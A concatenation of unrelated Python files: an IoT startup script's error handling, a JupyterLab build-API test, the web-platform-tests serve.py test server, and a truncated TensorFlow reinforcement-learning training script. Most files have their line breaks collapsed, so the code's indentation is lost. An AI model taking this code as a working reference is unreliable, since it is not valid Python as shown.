        print("All Threads Launched Successfully")
        if config["test"]:
            logging.info("Starting Tests ...")
            print("Starting Tests ...")
            time.sleep(2)
            tester = DMT(DM=DM)
            logging.info("Device_Level Manager Test:")
            print("Device_Level Manager Test:")
            tester.starer()  # 'starer' is DMT's actual method name (external API).
    except (KeyError, TypeError, FileNotFoundError, NameError) as err:
        # One handler for all anticipated startup failures. Previously four
        # copy-pasted handlers existed and the TypeError branch mislabeled
        # itself as "Key Error Occurred"; labeling by the exception's own
        # class name fixes that and removes the duplication.
        message = ("{} Occurred While Trying To Start IoT Device_Level. "
                   "Now Exiting Program.\nError Message: {}\n{}").format(
                       type(err).__name__, err, traceback.format_exc())
        print(message)
        logging.critical(message)
        exit()
    except Exception as e:
        message = "Failed To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format(
            e, traceback.format_exc())
        print(message)
        logging.critical(message)
        exit()
# ===== test_build_api.py =====
"""Test the kernels service API.""" import threading import time from jupyterlab.tests.utils import LabTestBase, APITester from notebook.tests.launchnotebook import assert_http_error class BuildAPITester(APITester): """Wrapper for build REST API requests""" url = 'lab/api/build' def getStatus(self): return self._req('GET', '') def build(self): return self._req('POST', '') def clear(self): return self._req('DELETE', '') class BuildAPITest(LabTestBase): """Test the build web service API""" def setUp(self): self.build_api = BuildAPITester(self.request) def test_get_status(self): """Make sure there are no kernels running at the start""" resp = self.build_api.getStatus().json() assert 'status' in resp assert 'message' in resp def test_build(self): resp = self.build_api.build() assert resp.status_code == 200 def test_clear(self): with assert_http_error(500): self.build_api.clear() def build_thread(): with assert_http_error(500): self.build_api.build() t1 = threading.Thread(target=build_thread) t1.start() while 1: resp = self.build_api.getStatus().json() if resp['status'] == 'building': break resp = self.build_api.clear() assert resp.status_code == 204
# ===== serve.py =====
# -*- coding: utf-8 -*- from __future__ import print_function import abc import argparse import json import logging import os import platform import signal import socket import subprocess import sys import threading import time import traceback from six.moves import urllib import uuid from collections import defaultdict, OrderedDict from itertools import chain, product from multiprocessing import Process, Event from localpaths import repo_root from six.moves import reload_module from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants from wptserve import server as wptserve, handlers from wptserve import stash from wptserve import config from wptserve.logger import set_logger from wptserve.handlers import filesystem_path, wrap_pipeline from wptserve.utils import get_port, HTTPException, http2_compatible from mod_pywebsocket import standalone as pywebsocket EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains " "are mapped to a loopback device in /etc/hosts.\n" "See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup " "for instructions.") def replace_end(s, old, new): """ Given a string `s` that ends with `old`, replace that occurrence of `old` with `new`. 
""" assert s.endswith(old) return s[:-len(old)] + new def domains_are_distinct(a, b): a_parts = a.split(".") b_parts = b.split(".") min_length = min(len(a_parts), len(b_parts)) slice_index = -1 * min_length return a_parts[slice_index:] != b_parts[slice_index:] class WrapperHandler(object): __meta__ = abc.ABCMeta headers = [] def __init__(self, base_path=None, url_base="/"): self.base_path = base_path self.url_base = url_base self.handler = handlers.handler(self.handle_request) def __call__(self, request, response): self.handler(request, response) def handle_request(self, request, response): headers = self.headers + handlers.load_headers( request, self._get_filesystem_path(request)) for header_name, header_value in headers: response.headers.set(header_name, header_value) self.check_exposure(request) path = self._get_path(request.url_parts.path, True) query = request.url_parts.query if query: query = "?" + query meta = "\n".join(self._get_meta(request)) script = "\n".join(self._get_script(request)) response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query} wrap_pipeline(path, request, response) def _get_path(self, path, resource_path): """Convert the path from an incoming request into a path corresponding to an "unwrapped" resource e.g. the file on disk that will be loaded in the wrapper. :param path: Path from the HTTP request :param resource_path: Boolean used to control whether to get the path for the resource that this wrapper will load or the associated file on disk. Typically these are the same but may differ when there are multiple layers of wrapping e.g. for a .any.worker.html input the underlying disk file is .any.js but the top level html file loads a resource with a .any.worker.js extension, which itself loads the .any.js file. 
If True return the path to the resource that the wrapper will load, otherwise return the path to the underlying file on disk.""" for item in self.path_replace: if len(item) == 2: src, dest = item else: assert len(item) == 3 src = item[0] dest = item[2 if resource_path else 1] if path.endswith(src): path = replace_end(path, src, dest) return path def _get_filesystem_path(self, request): """Get the path of the underlying resource file on disk.""" return self._get_path(filesystem_path(self.base_path, request, self.url_base), False) def _get_metadata(self, request): """Get an iterator over script metadata based on // META comments in the associated js file. :param request: The Request being processed. """ path = self._get_filesystem_path(request) try: with open(path, "rb") as f: for key, value in read_script_metadata(f, js_meta_re): yield key, value except IOError: raise HTTPException(404) def _get_meta(self, request): """Get an iterator over strings to inject into the wrapper document based on // META comments in the associated js file. :param request: The Request being processed. """ for key, value in self._get_metadata(request): replacement = self._meta_replacement(key, value) if replacement: yield replacement def _get_script(self, request): """Get an iterator over strings to inject into the wrapper document based on // META comments in the associated js file. :param request: The Request being processed. """ for key, value in self._get_metadata(request): replacement = self._script_replacement(key, value) if replacement: yield replacement @abc.abstractproperty def path_replace(self): # A list containing a mix of 2 item tuples with (input suffix, output suffix) # and 3-item tuples with (input suffix, filesystem suffix, resource suffix) # for the case where we want a different path in the generated resource to # the actual path on the filesystem (e.g. when there is another handler # that will wrap the file). 
return None @abc.abstractproperty def wrapper(self): # String template with variables path and meta for wrapper document return None @abc.abstractmethod def _meta_replacement(self, key, value): # Get the string to insert into the wrapper document, given # a specific metadata key: value pair. pass @abc.abstractmethod def check_exposure(self, request): # Raise an exception if this handler shouldn't be exposed after all. pass class HtmlWrapperHandler(WrapperHandler): global_type = None headers = [('Content-Type', 'text/html')] def check_exposure(self, request): if self.global_type: globals = u"" for (key, value) in self._get_metadata(request): if key == "global": globals = value break if self.global_type not in parse_variants(globals): raise HTTPException(404, "This test cannot be loaded in %s mode" % self.global_type) def _meta_replacement(self, key, value): if key == "timeout": if value == "long": return '<meta name="timeout" content="long">' if key == "title": value = value.replace("&", "&amp;").replace("<", "&lt;") return '<title>%s</title>' % value return None def _script_replacement(self, key, value): if key == "script": attribute = value.replace("&", "&amp;").replace('"', "&quot;") return '<script src="%s"></script>' % attribute return None class WorkersHandler(HtmlWrapperHandler): global_type = "dedicatedworker" path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"), (".worker.html", ".worker.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> <div id=log></div> <script> fetch_tests_from_worker(new Worker("%(path)s%(query)s")); </script> """ class WindowHandler(HtmlWrapperHandler): path_replace = [(".window.html", ".window.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> %(script)s <div id=log></div> <script 
src="%(path)s"></script> """ class AnyHtmlHandler(HtmlWrapperHandler): global_type = "window" path_replace = [(".any.html", ".any.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script> self.GLOBAL = { isWindow: function() { return true; }, isWorker: function() { return false; }, }; </script> <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> %(script)s <div id=log></div> <script src="%(path)s"></script> """ class SharedWorkersHandler(HtmlWrapperHandler): global_type = "sharedworker" path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> <div id=log></div> <script> fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s")); </script> """ class ServiceWorkersHandler(HtmlWrapperHandler): global_type = "serviceworker" path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> <div id=log></div> <script> (async function() { const scope = 'does/not/exist'; let reg = await navigator.serviceWorker.getRegistration(scope); if (reg) await reg.unregister(); reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope}); fetch_tests_from_worker(reg.installing); })(); </script> """ class AnyWorkerHandler(WrapperHandler): headers = [('Content-Type', 'text/javascript')] path_replace = [(".any.worker.js", ".any.js")] wrapper = """%(meta)s self.GLOBAL = { isWindow: function() { return false; }, isWorker: function() { return true; }, }; importScripts("/resources/testharness.js"); %(script)s importScripts("%(path)s"); done(); """ def _meta_replacement(self, key, value): return None def _script_replacement(self, key, value): if key == 
"script": attribute = value.replace("\\", "\\\\").replace('"', '\\"') return 'importScripts("%s")' % attribute if key == "title": value = value.replace("\\", "\\\\").replace('"', '\\"') return 'self.META_TITLE = "%s";' % value return None rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")] class RoutesBuilder(object): def __init__(self): self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler), ("POST", "/tools/runner/update_manifest.py", handlers.python_script_handler)] self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)), ("*", "/tools/*", handlers.ErrorHandler(404)), ("*", "{spec}/tools/*", handlers.ErrorHandler(404)), ("*", "/results/", handlers.ErrorHandler(404))] self.extra = [] self.mountpoint_routes = OrderedDict() self.add_mount_point("/", None) def get_routes(self): routes = self.forbidden_override + self.forbidden + self.extra # Using reversed here means that mount points that are added later # get higher priority. This makes sense since / is typically added # first. 
for item in reversed(self.mountpoint_routes.values()): routes.extend(item) return routes def add_handler(self, method, route, handler): self.extra.append((str(method), str(route), handler)) def add_static(self, path, format_args, content_type, route, headers=None): if headers is None: headers = {} handler = handlers.StaticHandler(path, format_args, content_type, **headers) self.add_handler("GET", str(route), handler) def add_mount_point(self, url_base, path): url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/" self.mountpoint_routes[url_base] = [] routes = [ ("GET", "*.worker.html", WorkersHandler), ("GET", "*.window.html", WindowHandler), ("GET", "*.any.html", AnyHtmlHandler), ("GET", "*.any.sharedworker.html", SharedWorkersHandler), ("GET", "*.any.serviceworker.html", ServiceWorkersHandler), ("GET", "*.any.worker.js", AnyWorkerHandler), ("GET", "*.asis", handlers.AsIsHandler), ("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler), ("*", "*.py", handlers.PythonScriptHandler), ("GET", "*", handlers.FileHandler) ] for (method, suffix, handler_cls) in routes: self.mountpoint_routes[url_base].append( (method, "%s%s" % (url_base if url_base != "/" else "", suffix), handler_cls(base_path=path, url_base=url_base))) def add_file_mount_point(self, file_url, base_path): assert file_url.startswith("/") url_base = file_url[0:file_url.rfind("/") + 1] self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))] def get_route_builder(aliases, config=None): builder = RoutesBuilder() for alias in aliases: url = alias["url-path"] directory = alias["local-dir"] if not url.startswith("/") or len(directory) == 0: logger.error("\"url-path\" value must start with '/'.") continue if url.endswith("/"): builder.add_mount_point(url, directory) else: builder.add_file_mount_point(url, directory) return builder class ServerProc(object): def __init__(self, scheme=None): self.proc = None self.daemon = None 
self.stop = Event() self.scheme = scheme def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs): self.proc = Process(target=self.create_daemon, args=(init_func, host, port, paths, routes, bind_address, config), name='%s on port %s' % (self.scheme, port), kwargs=kwargs) self.proc.daemon = True self.proc.start() def create_daemon(self, init_func, host, port, paths, routes, bind_address, config, **kwargs): if sys.platform == "darwin": # on Darwin, NOFILE starts with a very low limit (256), so bump it up a little # by way of comparison, Debian starts with a limit of 1024, Windows 512 import resource # local, as it only exists on Unix-like systems maxfilesperproc = int(subprocess.check_output( ["sysctl", "-n", "kern.maxfilesperproc"] ).strip()) soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE) # 2048 is somewhat arbitrary, but gives us some headroom for wptrunner --parallel # note that it's expected that 2048 will be the min here new_soft = min(2048, maxfilesperproc, hard) if soft < new_soft: resource.setrlimit(resource.RLIMIT_NOFILE, (new_soft, hard)) try: self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs) except socket.error: logger.critical("Socket error on port %s" % port, file=sys.stderr) raise except Exception: logger.critical(traceback.format_exc()) raise if self.daemon: try: self.daemon.start(block=False) try: self.stop.wait() except KeyboardInterrupt: pass except Exception: print(traceback.format_exc(), file=sys.stderr) raise def wait(self): self.stop.set() self.proc.join() def kill(self): self.stop.set() self.proc.terminate() self.proc.join() def is_alive(self): return self.proc.is_alive() def check_subdomains(config, routes): paths = config.paths bind_address = config.bind_address host = config.server_host port = get_port() logger.debug("Going to use port %d to check subdomains" % port) wrapper = ServerProc() wrapper.start(start_http_server, host, port, paths, routes, bind_address, config) 
url = "http://{}:{}/".format(host, port) connected = False for i in range(10): try: urllib.request.urlopen(url) connected = True break except urllib.error.URLError: time.sleep(1) if not connected: logger.critical("Failed to connect to test server " "on {}. {}".format(url, EDIT_HOSTS_HELP)) sys.exit(1) for domain in config.domains_set: if domain == host: continue try: urllib.request.urlopen("http://%s:%d/" % (domain, port)) except Exception: logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP)) sys.exit(1) wrapper.wait() def make_hosts_file(config, host): rv = [] for domain in config.domains_set: rv.append("%s\t%s\n" % (host, domain)) # Windows interpets the IP address 0.0.0.0 as non-existent, making it an # appropriate alias for non-existent hosts. However, UNIX-like systems # interpret the same address to mean any IP address, which is inappropraite # for this context. These systems do not reserve any value for this # purpose, so the inavailability of the domains must be taken for granted. # # https://github.com/web-platform-tests/wpt/issues/10560 if platform.uname()[0] == "Windows": for not_domain in config.not_domains_set: rv.append("0.0.0.0\t%s\n" % not_domain) return "".join(rv) def start_servers(host, ports, paths, routes, bind_address, config, **kwargs): servers = defaultdict(list) for scheme, ports in ports.items(): assert len(ports) == {"http": 2, "https": 2}.get(scheme, 1) # If trying to start HTTP/2.0 server, check compatibility if scheme == 'h2' and not http2_compatible(): logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. 
' + 'Requires Python 2.7.10+ or 3.6+ and OpenSSL 1.0.2+') continue for port in ports: if port is None: continue init_func = {"http": start_http_server, "https": start_https_server, "h2": start_http2_server, "ws": start_ws_server, "wss": start_wss_server, "quic-transport": start_quic_transport_server}[scheme] server_proc = ServerProc(scheme=scheme) server_proc.start(init_func, host, port, paths, routes, bind_address, config, **kwargs) servers[scheme].append((port, server_proc)) return servers def startup_failed(log=True): # Log=False is a workaround for https://github.com/web-platform-tests/wpt/issues/22719 if log: logger.critical(EDIT_HOSTS_HELP) else: print("CRITICAL %s" % EDIT_HOSTS_HELP, file=sys.stderr) sys.exit(1) def start_http_server(host, port, paths, routes, bind_address, config, **kwargs): try: return wptserve.WebTestHttpd(host=host, port=port, doc_root=paths["doc_root"], routes=routes, rewrites=rewrites, bind_address=bind_address, config=config, use_ssl=False, key_file=None, certificate=None, latency=kwargs.get("latency")) except Exception: startup_failed() def start_https_server(host, port, paths, routes, bind_address, config, **kwargs): try: return wptserve.WebTestHttpd(host=host, port=port, doc_root=paths["doc_root"], routes=routes, rewrites=rewrites, bind_address=bind_address, config=config, use_ssl=True, key_file=config.ssl_config["key_path"], certificate=config.ssl_config["cert_path"], encrypt_after_connect=config.ssl_config["encrypt_after_connect"], latency=kwargs.get("latency")) except Exception: startup_failed() def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs): try: return wptserve.WebTestHttpd(host=host, port=port, handler_cls=wptserve.Http2WebTestRequestHandler, doc_root=paths["doc_root"], ws_doc_root=paths["ws_doc_root"], routes=routes, rewrites=rewrites, bind_address=bind_address, config=config, use_ssl=True, key_file=config.ssl_config["key_path"], certificate=config.ssl_config["cert_path"], 
encrypt_after_connect=config.ssl_config["encrypt_after_connect"], latency=kwargs.get("latency"), http2=True) except Exception: startup_failed() class WebSocketDaemon(object): def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config): self.host = host cmd_args = ["-p", port, "-d", doc_root, "-w", handlers_root] if ssl_config is not None: cmd_args += ["--tls", "--private-key", ssl_config["key_path"], "--certificate", ssl_config["cert_path"]] if (bind_address): cmd_args = ["-H", host] + cmd_args opts, args = pywebsocket._parse_args_and_config(cmd_args) opts.cgi_directories = [] opts.is_executable_method = None self.server = pywebsocket.WebSocketServer(opts) ports = [item[0].getsockname()[1] for item in self.server._sockets] if not ports: # TODO: Fix the logging configuration in WebSockets processes # see https://github.com/web-platform-tests/wpt/issues/22719 print("Failed to start websocket server on port %s, " "is something already using that port?" % port, file=sys.stderr) raise OSError() assert all(item == ports[0] for item in ports) self.port = ports[0] self.started = False self.server_thread = None def start(self, block=False): self.started = True if block: self.server.serve_forever() else: self.server_thread = threading.Thread(target=self.server.serve_forever) self.server_thread.setDaemon(True) # don't hang on exit self.server_thread.start() def stop(self): """ Stops the server. If the server is not running, this method has no effect. 
""" if self.started: try: self.server.shutdown() self.server.server_close() self.server_thread.join() self.server_thread = None except AttributeError: pass self.started = False self.server = None def release_mozlog_lock(): try: from mozlog.structuredlog import StructuredLogger try: StructuredLogger._lock.release() except threading.ThreadError: pass except ImportError: pass def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs): # Ensure that when we start this in a new process we have the global lock # in the logging module unlocked reload_module(logging) release_mozlog_lock() try: return WebSocketDaemon(host, str(port), repo_root, config.paths["ws_doc_root"], bind_address, ssl_config=None) except Exception: startup_failed(log=False) def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs): # Ensure that when we start this in a new process we have the global lock # in the logging module unlocked reload_module(logging) release_mozlog_lock() try: return WebSocketDaemon(host, str(port), repo_root, config.paths["ws_doc_root"], bind_address, config.ssl_config) except Exception: startup_failed(log=False) class QuicTransportDaemon(object): def __init__(self, host, port, handlers_path=None, private_key=None, certificate=None, log_level=None): args = ["python3", "wpt", "serve-quic-transport"] if host: args += ["--host", host] if port: args += ["--port", str(port)] if private_key: args += ["--private-key", private_key] if certificate: args += ["--certificate", certificate] if handlers_path: args += ["--handlers-path", handlers_path] if log_level == "debug": args += ["--verbose"] self.command = args self.proc = None def start(self, block=False): if block: subprocess.call(self.command) else: def handle_signal(*_): if self.proc: try: self.proc.terminate() except OSError: # It's fine if the child already exits. 
pass self.proc.wait() sys.exit(0) signal.signal(signal.SIGTERM, handle_signal) signal.signal(signal.SIGINT, handle_signal) self.proc = subprocess.Popen(self.command) # Give the server a second to start and then check. time.sleep(1) if self.proc.poll(): sys.exit(1) def start_quic_transport_server(host, port, paths, routes, bind_address, config, **kwargs): # Ensure that when we start this in a new process we have the global lock # in the logging module unlocked reload_module(logging) release_mozlog_lock() try: return QuicTransportDaemon(host, port, private_key=config.ssl_config["key_path"], certificate=config.ssl_config["cert_path"], log_level=config.log_level) except Exception: startup_failed(log=False) def start(config, routes, **kwargs): host = config["server_host"] ports = config.ports paths = config.paths bind_address = config["bind_address"] logger.debug("Using ports: %r" % ports) servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs) return servers def iter_procs(servers): for servers in servers.values(): for port, server in servers: yield server.proc def _make_subdomains_product(s, depth=2): return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))} def _make_origin_policy_subdomains(limit): return {u"op%d" % x for x in range(1,limit+1)} _subdomains = {u"www", u"www1", u"www2", u"天気の良い日", u"élève"} _not_subdomains = {u"nonexistent"} _subdomains = _make_subdomains_product(_subdomains) # Origin policy subdomains need to not be reused by any other tests, since origin policies have # origin-wide impacts like installing a CSP or Feature Policy that could interfere with features # under test. # See https://github.com/web-platform-tests/rfcs/pull/44. _subdomains |= _make_origin_policy_subdomains(99) _not_subdomains = _make_subdomains_product(_not_subdomains) class ConfigBuilder(config.ConfigBuilder): """serve config This subclasses wptserve.config.ConfigBuilder to add serve config options. 
""" _default = { "browser_host": "web-platform.test", "alternate_hosts": { "alt": "not-web-platform.test" }, "doc_root": repo_root, "ws_doc_root": os.path.join(repo_root, "websockets", "handlers"), "server_host": None, "ports": { "http": [8000, "auto"], "https": [8443, 8444], "ws": ["auto"], "wss": ["auto"], }, "check_subdomains": True, "log_level": "debug", "bind_address": True, "ssl": { "type": "pregenerated", "encrypt_after_connect": False, "openssl": { "openssl_binary": "openssl", "base_path": "_certs", "password": "web-platform-tests", "force_regenerate": False, "duration": 30, "base_conf_path": None }, "pregenerated": { "host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"), "host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem") }, "none": {} }, "aliases": [] } computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties def __init__(self, *args, **kwargs): if "subdomains" not in kwargs: kwargs["subdomains"] = _subdomains if "not_subdomains" not in kwargs: kwargs["not_subdomains"] = _not_subdomains super(ConfigBuilder, self).__init__( *args, **kwargs ) with self as c: browser_host = c.get("browser_host") alternate_host = c.get("alternate_hosts", {}).get("alt") if not domains_are_distinct(browser_host, alternate_host): raise ValueError( "Alternate host must be distinct from browser host" ) def _get_ws_doc_root(self, data): if data["ws_doc_root"] is not None: return data["ws_doc_root"] else: return os.path.join(data["doc_root"], "websockets", "handlers") def ws_doc_root(self, v): self._ws_doc_root = v ws_doc_root = property(None, ws_doc_root) def _get_paths(self, data): rv = super(ConfigBuilder, self)._get_paths(data) rv["ws_doc_root"] = data["ws_doc_root"] return rv def build_config(override_path=None, config_cls=ConfigBuilder, **kwargs): rv = config_cls() enable_http2 = kwargs.get("h2") if enable_http2 is None: enable_http2 = True if enable_http2: rv._default["ports"]["h2"] = 
[9000] if override_path and os.path.exists(override_path): with open(override_path) as f: override_obj = json.load(f) rv.update(override_obj) if kwargs.get("config_path"): other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path"))) if os.path.exists(other_path): with open(other_path) as f: override_obj = json.load(f) rv.update(override_obj) else: raise ValueError("Config path %s does not exist" % other_path) overriding_path_args = [("doc_root", "Document root"), ("ws_doc_root", "WebSockets document root")] for key, title in overriding_path_args: value = kwargs.get(key) if value is None: continue value = os.path.abspath(os.path.expanduser(value)) if not os.path.exists(value): raise ValueError("%s path %s does not exist" % (title, value)) setattr(rv, key, value) return rv def get_parser(): parser = argparse.ArgumentParser() parser.add_argument("--latency", type=int, help="Artificial latency to add before sending http responses, in ms") parser.add_argument("--config", action="store", dest="config_path", help="Path to external config file") parser.add_argument("--doc_root", action="store", dest="doc_root", help="Path to document root. Overrides config.") parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root", help="Path to WebSockets document root. Overrides config.") parser.add_argument("--alias_file", action="store", dest="alias_file", help="File with entries for aliases/multiple doc roots. 
In form of `/ALIAS_NAME/, DOC_ROOT\\n`") parser.add_argument("--h2", action="store_true", dest="h2", default=None, help=argparse.SUPPRESS) parser.add_argument("--no-h2", action="store_false", dest="h2", default=None, help="Disable the HTTP/2.0 server") parser.add_argument("--quic-transport", action="store_true", help="Enable QUIC server for WebTransport") parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers") parser.set_defaults(report=False) parser.set_defaults(is_wave=False) return parser def run(config_cls=ConfigBuilder, route_builder=None, **kwargs): received_signal = threading.Event() with build_config(os.path.join(repo_root, "config.json"), config_cls=config_cls, **kwargs) as config: global logger logger = config.logger set_logger(logger) # Configure the root logger to cover third-party libraries. logging.getLogger().setLevel(config.log_level) def handle_signal(signum, frame): logger.debug("Received signal %s. Shutting down.", signum) received_signal.set() bind_address = config["bind_address"] if kwargs.get("alias_file"): with open(kwargs["alias_file"], 'r') as alias_file: for line in alias_file: alias, doc_root = [x.strip() for x in line.split(',')] config["aliases"].append({ 'url-path': alias, 'local-dir': doc_root, }) if route_builder is None: route_builder = get_route_builder routes = route_builder(config.aliases, config).get_routes() if config["check_subdomains"]: check_subdomains(config, routes) stash_address = None if bind_address: stash_address = (config.server_host, get_port("")) logger.debug("Going to use port %d for stash" % stash_address[1]) with stash.StashServer(stash_address, authkey=str(uuid.uuid4())): servers = start(config, routes, **kwargs) signal.signal(signal.SIGTERM, handle_signal) signal.signal(signal.SIGINT, handle_signal) while (all(subproc.is_alive() for subproc in iter_procs(servers)) and not received_signal.is_set() and not kwargs["exit_after_start"]): for subproc in iter_procs(servers): 
subproc.join(1) failed_subproc = 0 for subproc in iter_procs(servers): if subproc.is_alive(): logger.info('Status of subprocess "%s": running' % subproc.name) else: if subproc.exitcode == 0: logger.info('Status of subprocess "%s": exited correctly' % subproc.name) else: logger.warning('Status of subprocess "%s": failed. Exit with non-zero status: %d' % (subproc.name, subproc.exitcode)) failed_subproc += 1 return failed_subproc def main(): kwargs = vars(get_parser().parse_args()) return run(**kwargs)
# ==== file: train_in_thought_game_add_bn.py ====
from __future__ import absolute_import from __future__ import division from __future__ import print_function USED_DEVICES = "0,1" import os os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES import sys import threading import time import tensorflow as tf import multiprocessing as mp import numpy as np from logging import warning as logging from datetime import datetime from mini_network_add_bn import MiniNetwork from mini_agent_add_bn import MiniAgent from strategy.terran_agent import DummyTerran from unit.units import Army from lib.replay_buffer import Buffer from strategy_env import SimulatePlatform from absl import app from absl import flags import unit.protoss_unit as P import unit.terran_unit as T FLAGS = flags.FLAGS flags.DEFINE_bool("debug_mode", False, "Whether is debuging") flags.DEFINE_integer("num_for_update", 500, "How many episodes for one iteration") flags.DEFINE_integer("train_iters", 30, "How many iterations for one training") flags.DEFINE_integer("parallel", 10, "How many process to run, debug set to 1, training set to 10") flags.DEFINE_integer("thread_num", 5, "How many threads in one process, debug set to 1, training set to 5") flags.DEFINE_integer("port_num", 5370, "Port number for distribute training in tensorflow") flags.DEFINE_string("restore_model_path", "./model/20200825-101942_mini/", "path for restore model") flags.DEFINE_bool("restore_model", False, "Whether to restore old model") flags.DEFINE_string("restore_from", "mini", "mini (for Thought-Game) or source (for Real game)") flags.DEFINE_string("restore_to", "mini", "mini (for Thought-Game) or source (for Real game)") flags.DEFINE_bool("freeze_head", False, "Whether freeze_head train agents.") flags.DEFINE_bool("use_bn", True, "Whether use batch_norm to training.") flags.DEFINE_bool("use_sep_net", True, "Whether use seperate network for policy and value model.") flags.DEFINE_integer("max_agent_steps", 100, "Total agent steps.") 
flags.DEFINE_integer("max_distance", 5, "Max distance between blue and red one") flags.DEFINE_integer("initial_diff", 1, "The start level of opponent in mind-game") flags.DEFINE_float("win_rate_threshold", 0.95, "If win_rate exceeds this value, opponent level increase one") flags.DEFINE_bool("show_details", False, "Weather to show details of one mind-game, debug set to True, training set to False") FLAGS(sys.argv) # define some global variable UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event() Counter = 0 Waiting_Counter = 0 Update_Counter = 0 Result_List = [] SERVER_DICT = {"worker": [], "ps": []} if FLAGS.debug_mode: PARALLEL = 1 THREAD_NUM = 1 MAX_AGENT_STEPS = 100 NUM_FOR_UPDATE = 1 TRAIN_ITERS = 1 DISTANCE = FLAGS.max_distance PORT_NUM = FLAGS.port_num else: PARALLEL = FLAGS.parallel THREAD_NUM = FLAGS.thread_num MAX_AGENT_STEPS = FLAGS.max_agent_steps NUM_FOR_UPDATE = FLAGS.num_for_update TRAIN_ITERS = FLAGS.train_iters DISTANCE = FLAGS.max_distance PORT_NUM = FLAGS.port_num INITIAL_DIFF = FLAGS.initial_diff WIN_RATE_THRESHOLD = FLAGS.win_rate_threshold SHOW_DETAILS = FLAGS.show_details def run_thread(agent, game_num, Synchronizer, difficulty): global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List num = 0 proc_name = mp.current_process().name blue_agent = DummyTerran(diff=difficulty) blue_agent.get_power() env = SimulatePlatform(red_agent=agent, blue_agent=blue_agent, distance=DISTANCE, max_steps=MAX_AGENT_STEPS) env.init() agent.set_env(env) while True: env.simulate(FLAGS.debug_mode) if True: # check if the num of episodes is enough to update num += 1 Counter += 1 reward = agent.result Result_List.append(reward) logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %f!" 
% (int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward)) # time for update if num == game_num: num = 0 ROLLING_EVENT.clear() # worker stops rolling, wait for update if agent.agent_id != 0 and THREAD_NUM > 1: Waiting_Counter += 1 if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop UPDATE_EVENT.set() ROLLING_EVENT.wait() # update! else: if THREAD_NUM > 1: UPDATE_EVENT.wait() Synchronizer.wait() # wait for other processes to update agent.update_network(Result_List) Result_List.clear() agent.global_buffer.reset() Synchronizer.wait() Update_Counter += 1 # finish update UPDATE_EVENT.clear() Waiting_Counter = 0 ROLLING_EVENT.set() win_rate = agent.net.get_win_rate() if win_rate > WIN_RATE_THRESHOLD: difficulty += 1 env.blue_agent.set_diff(difficulty) print('Increase difficulty to:', difficulty) env.reset() def Worker(index, update_game_num, Synchronizer, cluster, model_path): print("Worker !") config = tf.ConfigProto( allow_soft_placement=True, log_device_placement=False, ) config.gpu_options.allow_growth = True worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config) #config.gpu_options.per_process_gpu_memory_fraction = 0.2 sess = tf.Session(target=worker.target, config=config) print("MiniNetwork !") mini_net = MiniNetwork(sess, index=index, summary_writer=None, rl_training=True, cluster=cluster, ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path, freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn, use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model, restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to) global_buffer = Buffer() agents = [] for i in range(THREAD_NUM): agent = MiniAgent(agent_id=i, global_buffer=global_buffer, net=mini_net, restore_model=FLAGS.restore_model) agents.append(agent) print("Worker %d: waiting for cluster connection..." % index) sess.run(tf.report_uninitialized_variables()) print("Worker %d: cluster ready!" 
